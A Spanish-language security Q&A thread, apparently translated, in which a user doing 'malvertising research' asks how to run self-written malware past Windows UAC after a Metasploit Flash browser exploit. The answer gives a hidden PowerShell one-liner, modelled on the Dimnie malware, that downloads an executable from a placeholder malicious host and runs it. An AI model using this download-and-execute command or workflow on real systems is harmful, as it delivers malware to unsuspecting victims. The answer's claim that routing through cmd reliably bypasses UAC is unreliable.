¿Desea omitir UAC sin la sesión de meterpreter?

1

Tengo un proyecto de investigación sobre "Malvertising". Intento mostrar un ataque utilizando metasploit y estoy usando un complemento de Flash para piratear a la víctima (exploit / multi / browser / adobe_flash_hacking_team_uaf)

Esto funciona bien y quiero ejecutar un malware invasivo de desarrollo propio. Así que estoy usando como carga (windows / download_exec) para descargar mi archivo.

Windows 7 es compatible con UAC, por lo que no puedo iniciar mi archivo sin preguntar.

Sé que metasploit tiene algunas vulnerabilidades para evitar UAC, pero todas requieren una sesión de meterpreter. No tengo eso en mi caso.

¿Puedo usar este exploit para integrarlo con mi malware?

    
pregunta Ulf 31.05.2016 - 10:33
fuente

1 respuesta

1

Hay muchas otras formas de omitir UAC sin importar el uso de metasploit, ya que estamos hablando del complemento Flash, su "exploit" se entregará a través de un navegador. Si toma el ejemplo del malware sin archivo "Dimnie" descubierto recientemente, la carga útil se elimina con Powershell, para evitar la detección estática introduce caracteres que el shell de Windows ignorará (por ejemplo: ^), pero el código "legible" que definitivamente saltará UAC se verá como:

cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://malicious.ma/somefolder/your_payload.exe','%dropfolder%.exe');start-process '%dropfolder%.exe'"

La transferencia a través de cmd generalmente le garantizará una omisión de UAC, al menos a nivel de privilegio de usuario.

    
respondido por el Soufiane Tahiri 30.03.2017 - 16:48
fuente

Lea otras preguntas en las etiquetas